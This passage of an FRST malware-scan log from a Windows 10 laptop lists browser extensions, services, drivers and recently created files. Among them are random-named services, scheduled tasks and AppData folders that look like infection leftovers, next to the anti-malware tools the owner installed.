CHR Extension: (Gmail) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-08-15]
CHR Extension: (Inbox by Gmail) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkclgpgponpjmpfokoepglboejdobkpl [2015-11-12]
CHR HKLM-x32\...\Chrome\Extension: [gihfmmedoddijgnhkgfgnkeohkpbipol] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-04-16]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 a2AntiMalware; C:\Program Files\Emsisoft Anti-Malware\a2service.exe [11332672 2016-03-24] (Emsisoft Ltd)
S4 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [113152 2010-03-18] (ArcSoft Inc.)
R2 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\49.0.2623.40\remoting_host.exe [69016 2016-02-05] (Google Inc.)
S4 CLDTVHNService; C:\Program Files (x86)\DirecTV\DirecTV\Kernel\DMP\CLDTVHNService.exe [75048 2009-09-17] ()
S4 ETDService; C:\Program Files\Elantech\ETDService.exe [144104 2015-10-31] (ELAN Microelectronics Corp.)
R2 Fabs; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe [1253376 2009-08-27] (MAGIX AG) [File not signed]
S4 FirebirdServerMAGIXInstance; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\fbserver.exe [3276800 2008-08-07] (MAGIX®) [File not signed]
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes)
S4 McciCMService; C:\Program Files (x86)\Common Files\Motive\McciCMService.exe [319488 2010-11-08] (Alcatel-Lucent) [File not signed]
S4 McciCMService64; C:\Program Files\Common Files\Motive\McciCMService.exe [517632 2010-11-08] (Alcatel-Lucent) [File not signed]
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe [270336 2001-02-23] (Microsoft Corporation) [File not signed]
R2 Micro Star SCM; C:\Program Files (x86)\System Control Manager\MSIService.exe [160768 2009-07-09] (Micro-Star International Co., Ltd.) [File not signed]
S4 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1720608 2014-07-25] (NVIDIA Corporation)
S4 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [18956064 2014-07-25] (NVIDIA Corporation)
R2 pgsql-8.3; C:\Program Files (x86)\PostgreSQL\8.3\bin\pg_ctl.exe [65536 2008-09-19] (PostgreSQL Global Development Group) [File not signed]
S4 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-04-16] ()
S4 ss_conn_service; C:\Program Files\Samsung\USB Drivers\25_escape\conn\ss_conn_service.exe [745224 2015-07-08] (DEVGURU Co., LTD.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5436176 2015-02-09] (TeamViewer GmbH)
R2 tmInstall; C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.EXE [50336 2015-09-15] (Thrustmaster®)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
S4 kBTNrls; "C:\ProgramData\QsKNKvQ\kBTNrls.exe" [X]
S4 Muibguaw; "C:\Users\RoNiN\AppData\Roaming\JiahiMhwodn\Tugboxh.exe" -cms [X]
S4 Nijgatfy; "C:\Users\RoNiN\AppData\Roaming\Kalekuhrin\Kalekuhrin.exe" -cms [X]
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AnyDVD; C:\Windows\System32\Drivers\AnyDVD.sys [125512 2010-12-01] (SlySoft, Inc.)
R3 AnyDVD; C:\Windows\SysWOW64\Drivers\AnyDVD.sys [125512 2010-12-01] (SlySoft, Inc.)
R3 ArcSoftKsUFilter; C:\Windows\System32\DRIVERS\ArcSoftKsUFilter.sys [19968 2009-05-26] (ArcSoft, Inc.)
S3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [165376 2015-07-09] (Microsoft Corporation)
S3 BthHFAud; C:\Windows\system32\DRIVERS\BthHfAud.sys [36864 2015-07-09] (Microsoft Corporation)
R1 epp; C:\PROGRAM FILES\EMSISOFT ANTI-MALWARE\epp.sys [124080 2016-02-11] (Emsisoft Ltd)
S3 EUCR; C:\Windows\System32\drivers\EUCR6SK.SYS [87888 2009-12-04] (ENE Technology Inc.)
R1 mbamchameleon; C:\WINDOWS\system32\drivers\mbamchameleon.sys [109272 2015-10-05] (Malwarebytes)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-04-08] (Malwarebytes)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [65408 2016-03-10] (Malwarebytes Corporation)
S3 MFE_RR; C:\Users\RoNiN\AppData\Local\Temp\mfe_rr.sys [24120 2016-04-07] (McAfee, Inc.)
S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2010-11-08] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 MRESP50; C:\Program Files (x86)\Common Files\Motive\MRESP50.sys [20096 2010-11-08] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 NTIOLib_1_0_4; C:\Program Files (x86)\msi\Live Update 5\NTIOLib_X64.sys [14136 2010-10-22] (MSI)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [20256 2014-07-25] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [40392 2014-03-31] (NVIDIA Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-06-17] (Realtek                                            )
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2011-02-14] (Duplex Secure Ltd.)
S3 tmbulk; C:\Windows\System32\Drivers\tmbulk.sys [133280 2015-06-30] (© Guillemot R&D, 2015. All rights reserved.)
S3 tmhidusb; C:\Windows\system32\DRIVERS\tmhidusb.sys [170144 2015-09-15] (Thrustmaster)
S3 tmResetMin; C:\Windows\System32\Drivers\tmResetMin.sys [36000 2015-09-15] (© Guillemot R&D, 2013. All rights reserved.)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-09] ()
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
U3 idsvc; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-04-08 10:20 - 2001-08-23 13:00 - 00034871 _____ C:\WINDOWS\system32\gpedit.msc
2016-04-08 10:18 - 2016-04-08 10:18 - 00016148 _____ C:\WINDOWS\system32\RONIN-LAPTOP_RoNiN_HistoryPrediction.bin
2016-04-08 09:56 - 2016-04-08 09:56 - 00707354 _____ C:\WINDOWS\unins000.exe
2016-04-08 09:56 - 2016-04-08 09:56 - 00001535 _____ C:\WINDOWS\unins000.dat
2016-04-08 09:56 - 2016-04-08 09:56 - 00000000 ____D C:\WINDOWS\SysWOW64\GPBAK
2016-04-08 09:56 - 2008-04-14 02:11 - 00295936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appmgr.dll
2016-04-08 09:56 - 2001-08-23 13:00 - 00034871 _____ C:\WINDOWS\SysWOW64\gpedit.msc
2016-04-07 20:55 - 2016-04-08 10:28 - 00000000 ____D C:\FRST
2016-04-07 18:06 - 2016-04-07 18:08 - 00271216 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_18.06.48_log.txt
2016-04-07 16:15 - 2016-04-07 17:52 - 00000000 ____D C:\AdwCleaner
2016-04-07 15:48 - 2016-04-07 15:48 - 00000490 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_15.48.47_log.txt
2016-04-07 15:05 - 2016-04-07 15:08 - 00270622 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_15.05.40_log.txt
2016-04-07 14:51 - 2016-04-07 14:51 - 00000947 _____ C:\Users\Public\Desktop\Emsisoft Anti-Malware.lnk
2016-04-07 14:51 - 2016-04-07 14:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Emsisoft Anti-Malware
2016-04-05 13:10 - 2016-04-08 13:34 - 00000000 ____D C:\virus
2016-03-29 18:40 - 2016-03-29 18:40 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (10).ica
2016-03-29 18:29 - 2016-03-29 18:29 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (9).ica
2016-03-29 18:21 - 2016-03-29 18:21 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (8).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001380 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (5).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (7).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (6).ica
2016-03-29 18:12 - 2016-03-29 18:19 - 59554128 _____ (Citrix Systems, Inc.) C:\Users\RoNiN\Downloads\CitrixReceiver4.2.100 (1).exe
2016-03-29 18:11 - 2016-03-29 18:22 - 00734784 _____ (Oracle Corporation) C:\Users\RoNiN\Downloads\JavaSetup8u77.exe
2016-03-29 18:10 - 2016-03-29 18:10 - 02072960 _____ (Pulse Secure, LLC) C:\Users\RoNiN\Downloads\JuniperSetupClientInstaller.exe
2016-03-24 00:01 - 2016-03-24 00:01 - 04622232 _____ (Google) C:\Users\RoNiN\Downloads\chrome_cleanup_tool (1).exe
2016-03-23 23:06 - 2016-03-29 18:45 - 00002282 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-03-23 23:06 - 2016-03-29 18:45 - 00002270 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-03-23 23:04 - 2016-03-23 23:05 - 00987728 _____ (Google Inc.) C:\Users\RoNiN\Downloads\ChromeSetup (1).exe
2016-03-23 23:02 - 2016-03-23 23:02 - 00000020 ___SH C:\Users\DefaultAppPool\ntuser.ini
2016-03-23 23:02 - 2016-03-23 23:02 - 00000000 _SHDL C:\Users\DefaultAppPool\My Documents
2016-03-23 23:02 - 2016-03-23 23:02 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Videos
2016-03-23 23:02 - 2016-03-23 23:02 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Pictures
2016-03-23 23:02 - 2016-03-23 23:02 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Music
2016-03-23 23:01 - 2016-03-23 23:02 - 00000000 ____D C:\Users\DefaultAppPool
2016-03-23 23:01 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Roaming\Real
2016-03-23 23:01 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Roaming\Media Center Programs
2016-03-23 23:01 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Local\NVIDIA Corporation
2016-03-23 23:01 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Local\NVIDIA
2016-03-23 23:01 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Local\Google
2016-03-23 22:36 - 2016-03-23 22:45 - 04584344 _____ (Google) C:\Users\RoNiN\Downloads\chrome_cleanup_tool.exe
2016-03-23 22:26 - 2016-03-23 22:26 - 00987728 _____ (Google Inc.) C:\Users\RoNiN\Downloads\ChromeSetup.exe
2016-03-23 11:41 - 2016-03-23 11:41 - 00001054 _____ C:\Users\RoNiN\Desktop\mwbytescan2016-03-23.txt
2016-03-23 07:41 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\is-BFNHB.tmp
2016-03-22 23:30 - 2016-03-22 23:30 - 00000000 ____D C:\ProgramData\Emsisoft
2016-03-22 21:58 - 2016-04-08 10:27 - 00000000 ____D C:\Program Files\Emsisoft Anti-Malware
2016-03-22 21:12 - 2016-03-23 11:46 - 225721384 ____N (Emsisoft Ltd. ) C:\Users\RoNiN\Desktop\EmsisoftAntiMalwareSetup.exe
2016-03-22 21:04 - 2016-03-22 21:04 - 00000020 ___SH C:\Users\postgres\ntuser.ini
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\My Documents
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Videos
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Pictures
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Music
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Roaming\Real
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Roaming\Media Center Programs
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\NVIDIA Corporation
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\NVIDIA
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\Google
2016-03-22 21:01 - 2016-04-05 12:43 - 00000000 ____D C:\Users\postgres
2016-03-22 20:37 - 2016-03-22 20:37 - 00671442 _____ C:\Users\RoNiN\Desktop\mwbytescan2016-03-22.txt
2016-03-22 18:54 - 2016-03-22 18:54 - 00000000 ___HD C:\$WINDOWS.~BT
2016-03-22 08:01 - 2016-04-08 09:49 - 00003650 _____ C:\WINDOWS\System32\Tasks\CreateExplorerShellUnelevatedTask
2016-03-21 23:37 - 2016-03-29 12:30 - 00000000 ____D C:\WINDOWS\Microsoft Antimalware
2016-03-21 23:03 - 2016-03-21 23:03 - 00001066 _____ C:\malwarebytes scan 2016-03-21.txt
2016-03-21 19:35 - 2016-03-21 19:35 - 00000046 _____ C:\Users\RoNiN\AppData\Roaming\WB.CFG
2016-03-21 19:12 - 2016-03-21 10:23 - 00886256 _____ (Microsoft Corporation) C:\Users\RoNiN\Desktop\mssstool64.exe
2016-03-14 21:33 - 2016-03-14 21:33 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Chromium
2016-03-14 18:48 - 2016-03-14 18:48 - 00000000 ____D C:\WINDOWS\system32\del
2016-03-13 21:32 - 2016-03-13 21:32 - 00000188 _____ C:\WINDOWS\rst30.bat
2016-03-13 19:52 - 2016-03-13 19:52 - 00000000 ____D C:\WINDOWS\system32\nod
2016-03-13 19:48 - 2016-03-13 19:48 - 00000000 ____D C:\WINDOWS\system32\aro
2016-03-13 19:38 - 2016-03-13 19:38 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\c
2016-03-13 19:38 - 2016-03-13 19:38 - 00000000 ____D C:\ProgramData\1457912307
2016-03-13 19:36 - 2016-03-13 19:36 - 00023554 _____ C:\WINDOWS\System32\Tasks\{08080F47-0D0F-0F09-7D11-7A79790B110F}
2016-03-13 19:29 - 2016-03-13 19:38 - 00000000 ___HD C:\ProgramData\wrc
2016-03-13 19:26 - 2016-03-13 19:26 - 00631808 _____ C:\WINDOWS\wrc.dat
2016-03-13 19:24 - 2016-03-13 19:47 - 06000640 _____ C:\Program Files (x86)\GUTD8C6.tmp
2016-03-13 19:24 - 2016-03-13 19:24 - 00000000 ____D C:\Program Files (x86)\GUMD7DA.tmp
2016-03-13 19:23 - 2016-03-21 20:44 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Setup Wizard
2016-03-13 18:52 - 2016-03-13 18:52 - 00003052 _____ C:\WINDOWS\System32\Tasks\Pritc
2016-03-13 18:51 - 2016-03-13 18:51 - 00000229 _____ C:\WINDOWS\DXM.REG
2016-03-13 18:44 - 2016-03-13 18:44 - 00000000 ____D C:\WINDOWS\system32\keja
2016-03-13 18:44 - 2016-03-13 18:44 - 00000000 ____D C:\WINDOWS\system32\byeq
2016-03-13 15:11 - 2016-03-13 15:11 - 00003418 _____ C:\WINDOWS\System32\Tasks\Rocfokt
2016-03-13 14:35 - 2016-03-25 14:59 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Vilvuk
2016-03-13 14:35 - 2016-03-22 23:42 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\MirhMevf
2016-03-13 14:32 - 2016-04-08 09:48 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-03-13 14:29 - 2016-03-23 07:41 - 00001181 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-03-13 14:29 - 2016-03-23 07:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-03-13 14:29 - 2016-03-23 07:41 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-03-13 14:29 - 2016-03-13 14:29 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-03-13 14:29 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-03-13 14:29 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-03-13 14:29 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-03-13 14:15 - 2016-03-13 14:27 - 22908888 _____ (Malwarebytes ) C:\Users\RoNiN\Downloads\mbam-setup-2.2.0.1024.exe
2016-03-13 14:04 - 2016-03-13 14:04 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\MCorp
2016-03-11 19:39 - 2016-03-11 19:39 - 07600640 _____ C:\Users\RoNiN\AppData\Roaming\agent.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 01786944 _____ C:\Users\RoNiN\AppData\Roaming\Silflex.tst
2016-03-11 19:39 - 2016-03-11 19:39 - 00018432 _____ C:\Users\RoNiN\AppData\Roaming\Main.dat
2016-03-11 19:38 - 2016-03-11 19:38 - 00072729 _____ C:\Users\RoNiN\AppData\Roaming\Dripsoling.tst
2016-03-11 19:36 - 2016-03-22 01:44 - 00000000 ____D C:\Users\RoNiN\AppData\Local\app
2016-03-11 19:33 - 2016-03-25 15:00 - 00000000 ____D C:\Users\RoNiN\AppData\LocalLow\Company
2016-03-11 19:33 - 2016-03-11 19:33 - 00003416 _____ C:\WINDOWS\System32\Tasks\Lhsorj
2016-03-11 19:32 - 2016-03-25 14:59 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Kalekuhrin
2016-03-11 19:32 - 2016-03-13 14:35 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Tempfolder
2016-03-11 19:32 - 2016-03-11 19:32 - 00127488 _____ C:\Users\RoNiN\AppData\Roaming\Installer.dat
2016-03-11 19:32 - 2016-03-11 19:32 - 00000000 ____D C:\uninst
2016-03-11 19:27 - 2016-03-23 16:05 - 00000000 ____D C:\ProgramData\DataFile
2016-03-11 19:27 - 2016-03-11 19:27 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2016-03-11 19:25 - 2016-04-08 09:47 - 00000368 ____H C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job
2016-03-11 19:25 - 2016-04-08 09:47 - 00000356 _____ C:\WINDOWS\Tasks\BJZJKCUBLH1.job
2016-03-11 19:25 - 2016-03-11 19:25 - 00003444 _____ C:\WINDOWS\System32\Tasks\WMMAWVKOLXONAOYC
2016-03-11 19:25 - 2016-03-11 19:25 - 00002928 _____ C:\WINDOWS\System32\Tasks\BJZJKCUBLH1
2016-03-11 19:24 - 2016-03-11 19:24 - 00000000 _____ C:\WINDOWS\SysWOW64\Number of results
2016-03-11 19:18 - 2016-03-11 19:16 - 00000967 _____ C:\WINDOWS\system32\Drivers\etc\hp.bak
2016-03-10 23:17 - 2016-03-10 23:17 - 00000000 ____D C:\Users\RoNiN\AppData\Local\CEF
2016-03-10 14:32 - 2016-03-10 23:19 - 00000000 ____D C:\Users\RoNiN\Downloads\DMBDMB
2016-03-09 18:06 - 2016-03-09 18:46 - 00000000 ____D C:\Users\RoNiN\Downloads\Bj The Chicago Kid - In My Mind
2016-03-09 18:04 - 2016-03-09 18:04 - 00000000 ____D C:\Program Files (x86)\basicData
2016-03-09 18:03 - 2016-03-09 18:03 - 00002560 _____ C:\Users\RoNiN\AppData\Local\uninstall.exe
2016-03-09 17:42 - 2016-03-09 17:42 - 00781238 _____ C:\Users\RoNiN\Downloads\Setup.zip
2016-03-09 17:37 - 2016-03-09 17:45 - 150662627 _____ C:\Users\RoNiN\Downloads\Bj The Chicago Kid - In My Mind.zip
2016-03-09 10:31 - 2016-02-23 08:16 - 02237952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-03-09 10:31 - 2016-02-23 07:55 - 24592896 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-03-09 10:31 - 2016-02-23 07:45 - 12504576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-03-09 10:31 - 2016-02-23 06:55 - 19326464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-03-09 10:31 - 2016-02-23 06:48 - 21859840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-03-09 10:31 - 2016-02-23 06:38 - 07524864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-03-09 10:31 - 2016-02-23 06:00 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-03-09 10:31 - 2016-02-23 06:00 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-03-09 10:31 - 2016-02-23 05:58 - 18800640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-03-09 10:30 - 2016-02-23 10:53 - 01314496 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-03-09 10:30 - 2016-02-23 10:52 - 00858408 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-03-09 10:30 - 2016-02-23 10:51 - 00633184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2016-03-09 10:30 - 2016-02-23 10:51 - 00146784 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2016-03-09 10:30 - 2016-02-23 10:50 - 00630160 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2016-03-09 10:30 - 2016-02-23 10:48 - 08022368 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-03-09 10:30 - 2016-02-23 10:48 - 01294352 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-03-09 10:30 - 2016-02-23 10:48 - 01123952 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-03-09 10:30 - 2016-02-23 10:41 - 01150816 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-03-09 10:30 - 2016-02-23 10:41 - 00299600 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMASF.DLL
2016-03-09 10:30 - 2016-02-23 10:41 - 00078040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wkscli.dll
2016-03-09 10:30 - 2016-02-23 10:40 - 00110584 _____ (Microsoft Corporation) C:\WINDOWS\system32\srvcli.dll
2016-03-09 10:30 - 2016-02-23 10:38 - 00272752 _____ (Microsoft Corporation) C:\WINDOWS\system32\sqmapi.dll
2016-03-09 10:30 - 2016-02-23 10:36 - 00080128 _____ (Microsoft Corporation) C:\WINDOWS\system32\netapi32.dll
2016-03-09 10:30 - 2016-02-23 10:11 - 00781984 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll
2016-03-09 10:30 - 2016-02-23 10:11 - 00658784 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-03-09 10:30 - 2016-02-23 10:11 - 00103776 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupApi.dll
2016-03-09 10:30 - 2016-02-23 10:08 - 03622272 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-03-09 10:30 - 2016-02-23 10:07 - 22322624 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-03-09 10:30 - 2016-02-23 09:39 - 00607416 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-03-09 10:30 - 2016-02-23 09:30 - 01643872 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-03-09 10:30 - 2016-02-23 09:25 - 01085632 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-03-09 10:30 - 2016-02-23 09:23 - 00952968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-03-09 10:30 - 2016-02-23 09:21 - 00529456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2016-03-09 10:30 - 2016-02-23 09:21 - 00141152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2016-03-09 10:30 - 2016-02-23 09:11 - 00249976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMASF.DLL
2016-03-09 10:30 - 2016-02-23 09:11 - 00073360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srvcli.dll
2016-03-09 10:30 - 2016-02-23 09:11 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wkscli.dll
2016-03-09 10:30 - 2016-02-23 09:09 - 00229352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sqmapi.dll
2016-03-09 10:30 - 2016-02-23 09:06 - 00069232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netapi32.dll
2016-03-09 10:30 - 2016-02-23 08:58 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-03-09 10:30 - 2016-02-23 08:50 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll
2016-03-09 10:30 - 2016-02-23 08:50 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetCfgNotifyObjectHost.exe
2016-03-09 10:30 - 2016-02-23 08:42 - 00658536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll
2016-03-09 10:30 - 2016-02-23 08:42 - 00467296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-03-09 10:30 - 2016-02-23 08:42 - 00078176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupApi.dll
2016-03-09 10:30 - 2016-02-23 08:39 - 02879024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-03-09 10:30 - 2016-02-23 08:38 - 20858360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-03-09 10:30 - 2016-02-23 08:35 - 00365568 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2016-03-09 10:30 - 2016-02-23 08:20 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dfsc.sys
